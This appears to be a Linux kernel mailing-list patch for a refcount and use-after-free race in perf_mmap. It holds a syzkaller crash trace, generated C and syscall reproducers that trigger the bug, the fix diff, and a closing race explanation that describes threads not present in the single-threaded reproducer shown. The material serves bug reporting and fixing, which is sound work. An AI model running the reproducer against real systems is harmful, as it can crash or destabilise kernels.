Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
 <TASK>
 __refcount_add include/linux/refcount.h:289 [inline]
 __refcount_inc include/linux/refcount.h:366 [inline]
 refcount_inc include/linux/refcount.h:383 [inline]
 perf_mmap_rb kernel/events/core.c:7005 [inline]
 perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
 vfs_mmap include/linux/fs.h:2405 [inline]
 mmap_file mm/internal.h:167 [inline]
 __mmap_new_file_vma mm/vma.c:2413 [inline]
 __mmap_new_vma mm/vma.c:2476 [inline]
 __mmap_region+0xea5/0x2250 mm/vma.c:2670
 mmap_region+0x267/0x350 mm/vma.c:2740
 do_mmap+0x769/0xe50 mm/mmap.c:558
 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
 __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
 __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xac/0x2a0
arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 
0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) 
\ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 
bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // 
__reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); 
NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 
= 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); 
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
Syzkaller reported a refcount_t: addition on 0; use-after-free warning
in perf_mmap.

The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread closes
the event or detaches the buffer during this window, the reference
count of rb can drop to zero, leading to a UAF or refcount saturation
when map_range() or subsequent logic attempts to use it.

Fix this by extending the scope of mmap_mutex to cover the entire setup
process, including map_range(), ensuring the buffer remains valid until
the mapping is complete.

Reported-by: kernel test robot <lkp@intel.com>
Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
 kernel/events/core.c | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..abefd1213582 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
 		ret = perf_mmap_aux(vma, event, nr_pages);
 		if (ret)
 			return ret;
-	}
-	/*
-	 * Since pinned accounting is per vm we cannot allow fork() to copy our
-	 * vma.
-	 */
-	vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
-	vma->vm_ops = &perf_mmap_vmops;
+		/*
+		 * Since pinned accounting is per vm we cannot allow fork() to copy our
+		 * vma.
+		 */
+		vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+		vma->vm_ops = &perf_mmap_vmops;
-	mapped = get_mapped(event, event_mapped);
-	if (mapped)
-		mapped(event, vma->vm_mm);
+		mapped = get_mapped(event, event_mapped);
+		if (mapped)
+			mapped(event, vma->vm_mm);
-	/*
-	 * Try to map it into the page table. On fail, invoke
-	 * perf_mmap_close() to undo the above, as the callsite expects
-	 * full cleanup in this case and therefore does not invoke
-	 * vmops::close().
-	 */
-	ret = map_range(event->rb, vma);
-	if (ret)
-		perf_mmap_close(vma);
+		/*
+		 * Try to map it into the page table. On fail, invoke
+		 * perf_mmap_close() to undo the above, as the callsite expects
+		 * full cleanup in this case and therefore does not invoke
+		 * vmops::close().
+		 */
+		ret = map_range(event->rb, vma);
+		if (ret)
+			perf_mmap_close(vma);
+	}
 
 	return ret;
 }

base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449
-- 
2.51.0
{ "author": "Haocheng Yu <yuhaocheng035@gmail.com>", "date": "Mon, 2 Feb 2026 15:44:35 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow:

1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.

2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.

3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. Meanwhile, Thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.

4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.

